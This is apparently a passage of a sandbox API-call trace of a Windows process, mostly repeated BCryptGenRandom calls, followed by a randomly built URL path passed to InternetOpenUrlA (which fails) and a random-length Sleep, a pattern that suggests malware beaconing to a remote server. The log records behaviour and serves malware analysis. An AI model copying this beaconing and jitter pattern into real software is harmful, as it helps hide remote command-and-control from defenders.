pbBuffer=0x46ffd5f) returned 0x0 [0173.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01acb, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a01acb) returned 0x0 [0173.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.647] GetProcessHeap () returned 0x440000 [0173.647] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0173.647] lstrcpyA (in: lpString1=0x473560, lpString2="P\x1a \x03" | out: lpString1="P\x1a \x03") returned="P\x1a \x03" [0173.647] lstrcatA (in: lpString1="P\x1a \x03", lpString2="/SnxdNiurJg81bf1fnu8rbbopl2/nxvy4qtpza7c0kh36a9nwwd4pn89x/gjiguhvdkdbZr6wg4Ve1xpxf/IzgqsidNksTrbFtgkorbgfovxmaoxutAcnwj3Gs/dd3qsld2h9pfyrej4og6jucg5gmyu1vo12/" | out: lpString1="P\x1a \x03/SnxdNiurJg81bf1fnu8rbbopl2/nxvy4qtpza7c0kh36a9nwwd4pn89x/gjiguhvdkdbZr6wg4Ve1xpxf/IzgqsidNksTrbFtgkorbgfovxmaoxutAcnwj3Gs/dd3qsld2h9pfyrej4og6jucg5gmyu1vo12/") returned="P\x1a \x03/SnxdNiurJg81bf1fnu8rbbopl2/nxvy4qtpza7c0kh36a9nwwd4pn89x/gjiguhvdkdbZr6wg4Ve1xpxf/IzgqsidNksTrbFtgkorbgfovxmaoxutAcnwj3Gs/dd3qsld2h9pfyrej4og6jucg5gmyu1vo12/" [0173.647] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0173.647] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P\x1a \x03/SnxdNiurJg81bf1fnu8rbbopl2/nxvy4qtpza7c0kh36a9nwwd4pn89x/gjiguhvdkdbZr6wg4Ve1xpxf/IzgqsidNksTrbFtgkorbgfovxmaoxutAcnwj3Gs/dd3qsld2h9pfyrej4og6jucg5gmyu1vo12/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0173.647] GetProcessHeap () returned 0x440000 [0173.647] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0173.647] GetProcessHeap () returned 0x440000 [0173.647] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01a50 | out: hHeap=0x440000) returned 1 [0173.647] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0173.648] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0173.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0173.648] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0173.648] Sleep (dwMilliseconds=0x1d266) [0173.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0173.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.765] GetProcessHeap () returned 0x440000 [0173.765] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5130 [0173.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5131, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x4f5131) returned 0x0 [0173.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.774] GetProcessHeap () returned 0x440000 [0173.774] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0173.774] 